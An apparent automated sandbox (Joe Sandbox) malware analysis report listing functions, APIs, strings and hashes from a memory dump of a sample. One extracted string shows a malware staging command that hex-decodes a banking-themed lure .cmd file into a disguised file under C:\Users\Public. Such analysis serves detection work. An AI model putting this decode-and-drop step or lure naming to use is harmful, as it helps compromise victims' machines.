                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC1FAC Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 260COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memsetwcsspn
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3809306610-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3c1ac224328112a7378df654f5699de352bf9cf411d9ff9ce1b7eeaceb00e96a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b301965ff12d262252dd12f41c330d116590c5451c87bac9252232e49858c122
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCB19F62A08B4686EA50EB19EC7027BA7A0FF54B90FC58031DA4E47795DF7DE942C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBDF60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDes, xrefs: 00007FF706EBE00B
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess_setjmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDes
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 777023205-2473208872
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 53a0a4433051f8b2f785c66eb16cb0a63c9f7616d80db91828768e717dce03b3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98513970D0DB4286FB14AB15ACA017BFAA0BF68790FD95536D94E823A5DF3CA4408720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED5770 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 169COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CreateSemaphore
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`$_p0$wil
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1078844751-2179930112
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6a523512e982a220c5e5f49bf3ffcf026087dac80177ebe14f5ff2bfeb0484b5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF51D765B2978286EE21AF549C746BBE290FF84B94FE84435DB0D0B785DF3DE4058720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDFB54 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DiskFreeSpace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %5lu$P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2448137811-679905866
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e43d950d8196c44844f01b920a81d61f4065bd43d658c730bd1d2ed66f9c3c7e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7417C26608BC685EB61EF61EC606EBA360FF84788F848031EA4D0BB58DF7CD149C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EE0774 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$_wcslwr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`$[%s]
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 886762496-3873298622
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ce8a27e920f572e404f41a904e0e9e1f32ad4afac90b3a855897b1604137cddc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69315936715B8685EB21EF21EC603EAA7A0FF89B88F844135DA8D4BB55DF3CD2458710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDF358 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DriveFullNamePathType
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3442494845-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d11bcac15fab6a18b2e7a72af0edaa37a4a80aea7b5e0f5789bf03a59a7560d5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4faa7a40be53a6a0e94dcc52435e0141cda1ae593caa646d4c93336f675662c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF31B032615BC68AEB60DF20ED503EAB7A4FB88B88F844135DA4E47B54CF38D245C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC8F80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 140117192-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6374ea99e903d2f54e8a17e675fc9d7be37f4456c797b845f176888aae459462
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4841D439A08B4285EA50AB08FCA036AB3A4FF98758F900036DA8D47764EF3CE445C720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EE1914 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$DriveNamePathTypeVolume
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1029679093-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 648f10d67281140203619d4de7fafdffd58f3cadffb3b7db4f49e3fa1cc95902
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28313A36709B858AEB209F61DC643EAA7A4FB89B88F848175CA4D4B748DF3CD645C710
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EDCFF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF706EC507A), ref: 00007FF706EDD01C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF706EC507A), ref: 00007FF706EDD033
                                                                                                                                                                                                                                                                                                                                                                                                                                          • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF706EC507A), ref: 00007FF706EDD06D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF706EC507A), ref: 00007FF706EDD07F
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1033415088-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 491905fd8f7d7267a23225394b58ea8fdbe6c015282cfb1fc66979edd480b55e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A116035618B8286DA44AB20FC6417BF7A1FF8EB95F845135EA8E47B94DF3CD0458B10
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB58D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
